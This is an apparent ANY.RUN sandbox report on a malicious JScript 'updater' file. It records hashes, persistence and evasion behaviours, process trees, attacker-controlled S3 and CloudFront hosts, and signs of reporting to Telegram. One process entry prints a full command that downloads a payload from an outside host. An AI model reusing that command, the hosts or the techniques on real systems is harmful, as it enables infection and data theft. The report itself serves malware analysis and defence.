File name:

Updater_31718.js

Full analysis: https://app.any.run/tasks/ce1fe2a1-137f-4cac-9d7f-8d3faad379eb
Verdict: Malicious activity
Analysis date: September 03, 2025, 17:52:16
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-download
auto-startup
evasion
Indicators:
MIME: application/javascript
File info: JavaScript source, ASCII text, with very long lines (49255)
MD5:

660F6D7B790C2188DD7BD6C0C80E5293

SHA1:

FD9483B5938F8431807BC170938475776457DB55

SHA256:

FE3C13F85B4D4E938BE59B6444FB0346750A31FB5829880B5349174033FC4AA4

SSDEEP:

1536:hD3C6g4FgfKNeu7vC6zUadXL11G1YObBuG:hD3rg4KKeCPzUadXL/G15/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Gets %appdata% folder path (SCRIPT)

      • wscript.exe (PID: 640)
      • wscript.exe (PID: 3972)
    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 640)
      • wscript.exe (PID: 3972)
    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 640)
    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 640)
    • Gets a file object corresponding to the file in a specified path (SCRIPT)

      • wscript.exe (PID: 640)
    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 640)
    • Detects the decoding of a binary file from Base64 (SCRIPT)

      • wscript.exe (PID: 640)
    • Uses base64 encoding (SCRIPT)

      • wscript.exe (PID: 640)
    • Starts CMD.EXE for self-deleting

      • cmd.exe (PID: 4044)
      • cmd.exe (PID: 6292)
      • wscript.exe (PID: 3972)
    • Executing a file with an untrusted certificate

      • nasa.exe (PID: 4880)
      • nasa.exe (PID: 304)
      • nasa.exe (PID: 5780)
      • nasa.exe (PID: 5552)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2320)
    • Gets startup folder path (SCRIPT)

      • wscript.exe (PID: 3972)
    • Create files in the Startup directory

      • wscript.exe (PID: 3972)
    • Gets path to any of the special folders (SCRIPT)

      • wscript.exe (PID: 3972)
  • SUSPICIOUS

    • Accesses current user name via WMI (SCRIPT)

      • wscript.exe (PID: 640)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 640)
      • wscript.exe (PID: 3972)
    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 640)
      • wscript.exe (PID: 3972)
    • Checks whether a specific file exists (SCRIPT)

      • wscript.exe (PID: 640)
    • Adds, changes, or deletes HTTP request header (SCRIPT)

      • wscript.exe (PID: 640)
    • Creates XML DOM element (SCRIPT)

      • wscript.exe (PID: 640)
    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • wscript.exe (PID: 640)
    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 640)
    • Script creates XML DOM node (SCRIPT)

      • wscript.exe (PID: 640)
    • Saves data to a binary file (SCRIPT)

      • wscript.exe (PID: 640)
    • Sets XML DOM element text (SCRIPT)

      • wscript.exe (PID: 640)
    • Executable content was dropped or overwritten

      • wscript.exe (PID: 640)
      • xcopy.exe (PID: 3644)
      • nasa.exe (PID: 304)
      • 7za.exe (PID: 4676)
      • javaw.exe (PID: 2996)
      • javaw.exe (PID: 4560)
    • Uses ATTRIB.EXE to modify file attributes

      • wscript.exe (PID: 640)
      • cmd.exe (PID: 4044)
      • cmd.exe (PID: 6292)
      • cmd.exe (PID: 6812)
    • Decoding a file from Base64 using CertUtil

      • cmd.exe (PID: 4044)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 640)
      • cmd.exe (PID: 4044)
      • cmd.exe (PID: 6292)
      • powershell.exe (PID: 2320)
      • cmd.exe (PID: 6812)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 640)
      • wscript.exe (PID: 3972)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4044)
      • wscript.exe (PID: 640)
      • cmd.exe (PID: 6292)
      • powershell.exe (PID: 2320)
      • wscript.exe (PID: 3972)
      • cmd.exe (PID: 6812)
    • Hides command output

      • cmd.exe (PID: 4544)
      • cmd.exe (PID: 4880)
      • cmd.exe (PID: 7596)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 4544)
      • cmd.exe (PID: 4880)
      • cmd.exe (PID: 6812)
    • Application launched itself

      • cmd.exe (PID: 6292)
      • cmd.exe (PID: 4044)
      • cmd.exe (PID: 6812)
    • Process copies executable file

      • cmd.exe (PID: 6292)
    • The executable file from the user directory is run by the CMD process

      • nasa.exe (PID: 4880)
      • nasa.exe (PID: 304)
      • nasa.exe (PID: 5780)
      • 7za.exe (PID: 5992)
      • nasa.exe (PID: 5552)
      • 7za.exe (PID: 4676)
      • javaw.exe (PID: 4104)
      • javaw.exe (PID: 4560)
      • javaw.exe (PID: 2996)
    • Drops 7-zip archiver for unpacking

      • nasa.exe (PID: 304)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6292)
    • Starts process via Powershell

      • powershell.exe (PID: 2320)
    • Process drops legitimate windows executable

      • 7za.exe (PID: 4676)
    • The process drops C-runtime libraries

      • 7za.exe (PID: 4676)
    • The process executes JS scripts

      • cmd.exe (PID: 6812)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 7596)
    • Get information on the list of running processes

      • javaw.exe (PID: 4560)
      • javaw.exe (PID: 2996)
    • Connects to unusual port

      • javaw.exe (PID: 4104)
    • Starts NET.EXE to display or manage information about active sessions

      • net.exe (PID: 7228)
      • javaw.exe (PID: 2996)
      • javaw.exe (PID: 4560)
      • net.exe (PID: 7940)
    • Checks for external IP

      • svchost.exe (PID: 2200)
      • javaw.exe (PID: 2996)
      • javaw.exe (PID: 4560)
    • Identifying current user with WHOAMI command

      • javaw.exe (PID: 2996)
      • javaw.exe (PID: 4560)
  • INFO

    • Creates files or folders in the user directory

      • certutil.exe (PID: 2368)
      • xcopy.exe (PID: 3644)
      • nasa.exe (PID: 4880)
      • nasa.exe (PID: 304)
      • nasa.exe (PID: 5780)
      • 7za.exe (PID: 5992)
      • nasa.exe (PID: 5552)
      • 7za.exe (PID: 4676)
      • javaw.exe (PID: 2996)
    • Create files in a temporary directory

      • certutil.exe (PID: 3948)
      • javaw.exe (PID: 4560)
      • javaw.exe (PID: 4104)
      • javaw.exe (PID: 2996)
    • Reads the machine GUID from the registry

      • nasa.exe (PID: 4880)
      • nasa.exe (PID: 304)
      • nasa.exe (PID: 5780)
      • nasa.exe (PID: 5552)
      • javaw.exe (PID: 2996)
      • javaw.exe (PID: 4560)
    • Checks supported languages

      • nasa.exe (PID: 4880)
      • nasa.exe (PID: 304)
      • 7za.exe (PID: 5992)
      • nasa.exe (PID: 5780)
      • nasa.exe (PID: 5552)
      • 7za.exe (PID: 4676)
      • javaw.exe (PID: 4104)
      • javaw.exe (PID: 2996)
      • javaw.exe (PID: 4560)
    • Reads the computer name

      • nasa.exe (PID: 4880)
      • nasa.exe (PID: 304)
      • nasa.exe (PID: 5780)
      • 7za.exe (PID: 5992)
      • nasa.exe (PID: 5552)
      • 7za.exe (PID: 4676)
      • javaw.exe (PID: 4104)
      • javaw.exe (PID: 2996)
      • javaw.exe (PID: 4560)
    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 5340)
    • The sample compiled with english language support

      • nasa.exe (PID: 304)
      • 7za.exe (PID: 4676)
    • Reads security settings of Internet Explorer

      • OpenWith.exe (PID: 5340)
    • Application launched itself

      • Acrobat.exe (PID: 5020)
      • AcroCEF.exe (PID: 3948)
    • Creates files in the program directory

      • javaw.exe (PID: 4560)
    • Launching a file from the Startup directory

      • wscript.exe (PID: 3972)
    • Checks proxy server information

      • slui.exe (PID: 7764)
    • Reads the software policy settings

      • slui.exe (PID: 7764)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
294
Monitored processes
158
Malicious processes
10
Suspicious processes
3

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
236timeout /t 1 C:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
304"C:\Users\admin\AppData\Roaming\nasa.exe" -q --user-agent="casablanca" --header="X-My-Header: shjahsashihi29938299282000320" -O "C:\Users\admin\AppData\Roaming\7za.exe" "https://dy7h8izgcodp3.cloudfront.net/contactus.asp" C:\Users\admin\AppData\Roaming\nasa.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\roaming\nasa.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
424tasklist.exeC:\Windows\SysWOW64\tasklist.exejavaw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
480tasklist.exeC:\Windows\SysWOW64\tasklist.exejavaw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
512\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exetasklist.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
640"C:\Windows\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\Updater_31718.jsC:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
684"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1540 --field-trial-handle=1616,i,2776839931338270552,10849159344902035853,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
700tasklist.exeC:\Windows\SysWOW64\tasklist.exejavaw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
864tasklist.exeC:\Windows\SysWOW64\tasklist.exejavaw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
1100attrib -h "C:\Users\admin\1w5wnlju.bat" C:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
Total events
55 410
Read events
55 276
Write events
129
Delete events
5

Modification events

(PID) Process:(640) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
96DB180000000000
(PID) Process:(6292) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:writeName:Acrobat.Document.DC
Value:
(PID) Process:(5340) OpenWith.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:writeName:Acrobat.Document.DC
Value:
(PID) Process:(5020) Acrobat.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation:writeName:DisplayName
Value:
Adobe Acrobat Reader Protected Mode
(PID) Process:(6232) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation:writeName:bLastExitNormal
Value:
0
(PID) Process:(6232) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:writeName:bSynchronizeOPL
Value:
0
(PID) Process:(6232) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:writeName:uLastAppLaunchTimeStamp
Value:
280324936
(PID) Process:(6232) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:writeName:iNumAcrobatLaunches
Value:
7
(PID) Process:(6232) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ToolsSearch
Operation:writeName:iSearchHintIndex
Value:
3
(PID) Process:(6232) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:writeName:sProductGUID
Value:
4143524F5F5245534944554500
Executable files
166
Suspicious files
217
Text files
121
Unknown types
0

Dropped files

PID
Process
Filename
Type
640wscript.exeC:\Users\admin\AppData\Roaming\nasaexecutable
MD5:E314B40A188DE73B6A16A8197F80EE68
SHA256:D6E2656521CA76AD47AD2C503C9F71B3D00820E8B05275D048F7DEA0C9C30BEB
6232Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTINGbinary
MD5:DC84B0D741E5BEAE8070013ADDCC8C28
SHA256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
6232Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalbinary
MD5:9ED462DED5FE118FC016B56BB5A4AD02
SHA256:FB50CA1D60B6B0FEFDB4ECE0728EC443C2EB7C5D066C696380B17C82474D21B1
640wscript.exeC:\Users\admin\1w5wnlju.battext
MD5:515888353F816FA5A685D66549B1CCC7
SHA256:5FEFDAA9A402B1EA885625FEBED60447D2491CD21DFDDF71D5FADF4F170F5945
6232Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6232binary
MD5:366B140BAFC863B7E366AA1E51604759
SHA256:CBC8B288DBD2C72432081CF33CEF431572A94C7FB89DBCD59973B99E3871814E
5020Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lstbinary
MD5:366B140BAFC863B7E366AA1E51604759
SHA256:CBC8B288DBD2C72432081CF33CEF431572A94C7FB89DBCD59973B99E3871814E
2320powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:A47F57A8FC6A566CA71F1B439A6E3EC5
SHA256:3DEFFFEE6EBFA9DC578BFDEC3511DFB1305C0BD77EF656146942CED79C0F867F
6232Acrobat.exeC:\Users\admin\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.1.20093.6 2025-09-03 17-52-31-980.logtext
MD5:460C6041966002D8384A18C895A65EB0
SHA256:C83EC6E8FB3EC62481289C033238C1D9B08DB8076EAAD304099FD7A7F594F1B9
6232Acrobat.exeC:\Users\admin\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txttext
MD5:E94526EFE6CC9CB73A2F6DA92E58D169
SHA256:3244F97590D3EBB10D1F4DC50F6D6FF9F193199D00BBB263C0DA001B619032D7
2368certutil.exeC:\Users\admin\AppData\Roaming\dup8719.battext
MD5:515888353F816FA5A685D66549B1CCC7
SHA256:5FEFDAA9A402B1EA885625FEBED60447D2491CD21DFDDF71D5FADF4F170F5945
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
37
DNS requests
28
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
23.216.77.42:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
5020
Acrobat.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAfy81yHqHeveu%2FpR5k1Jb0%3D
US
binary
471 b
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
NL
binary
814 b
whitelisted
8008
SIHClient.exe
GET
200
69.192.161.161:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
DE
binary
419 b
whitelisted
8008
SIHClient.exe
GET
200
69.192.161.161:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
DE
binary
407 b
whitelisted
2940
svchost.exe
GET
200
104.76.201.34:80
http://x1.c.lencr.org/
DE
binary
734 b
whitelisted
5564
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
2996
javaw.exe
GET
200
52.49.106.241:80
http://checkip.amazonaws.com/
IE
text
14 b
whitelisted
4560
javaw.exe
GET
200
52.49.106.241:80
http://checkip.amazonaws.com/
IE
text
14 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1040
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
640
wscript.exe
3.5.9.55:443
apocolypser.s3.us-east-1.amazonaws.com
AMAZON-AES
US
shared
4
System
192.168.100.255:138
whitelisted
640
wscript.exe
54.231.138.178:443
publiclfolderfor-essetialcompanymatters.s3.us-east-1.amazonaws.com
AMAZON-02
US
shared
4880
nasa.exe
99.86.1.166:443
dy7h8izgcodp3.cloudfront.net
AMAZON-02
US
whitelisted
304
nasa.exe
99.86.1.166:443
dy7h8izgcodp3.cloudfront.net
AMAZON-02
US
whitelisted
5780
nasa.exe
99.86.1.166:443
dy7h8izgcodp3.cloudfront.net
AMAZON-02
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.104.136.2
  • 51.124.78.146
whitelisted
google.com
  • 142.250.181.238
whitelisted
apocolypser.s3.us-east-1.amazonaws.com
  • 3.5.9.55
  • 16.15.185.114
  • 54.231.226.122
  • 16.15.202.54
  • 16.15.184.2
  • 52.216.212.66
  • 52.216.76.240
  • 54.231.228.250
shared
publiclfolderfor-essetialcompanymatters.s3.us-east-1.amazonaws.com
  • 54.231.138.178
  • 54.231.228.178
  • 16.15.201.235
  • 52.216.177.38
  • 16.182.41.250
  • 3.5.9.152
  • 54.231.233.98
  • 52.216.53.130
shared
dy7h8izgcodp3.cloudfront.net
  • 99.86.1.166
  • 99.86.1.175
  • 99.86.1.39
  • 99.86.1.204
whitelisted
login.live.com
  • 20.190.159.130
  • 20.190.159.129
  • 20.190.159.73
  • 40.126.31.69
  • 40.126.31.0
  • 40.126.31.1
  • 20.190.159.131
  • 40.126.31.2
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
olyguard.s3.us-east-1.amazonaws.com
  • 52.217.135.106
  • 16.15.176.255
  • 52.216.245.136
  • 16.15.180.1
  • 52.216.43.194
  • 16.15.188.129
  • 54.231.228.186
  • 3.5.12.26
shared
crl.microsoft.com
  • 23.216.77.42
  • 23.216.77.6
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 69.192.161.161
whitelisted

Threats

PID
Process
Class
Message
2996
javaw.exe
Potentially Bad Traffic
ET INFO Vulnerable Java Version 1.8.x Detected
2200
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (checkip .amazonaws .com)
2996
javaw.exe
Device Retrieving External IP Address Detected
ET INFO External IP Check (checkip .amazonaws .com)
2200
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain (ipapi .co in DNS lookup)
4560
javaw.exe
Potentially Bad Traffic
ET INFO Vulnerable Java Version 1.8.x Detected
4560
javaw.exe
Device Retrieving External IP Address Detected
ET INFO External IP Check (checkip .amazonaws .com)
2200
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2200
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
2996
javaw.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4560
javaw.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
No debug info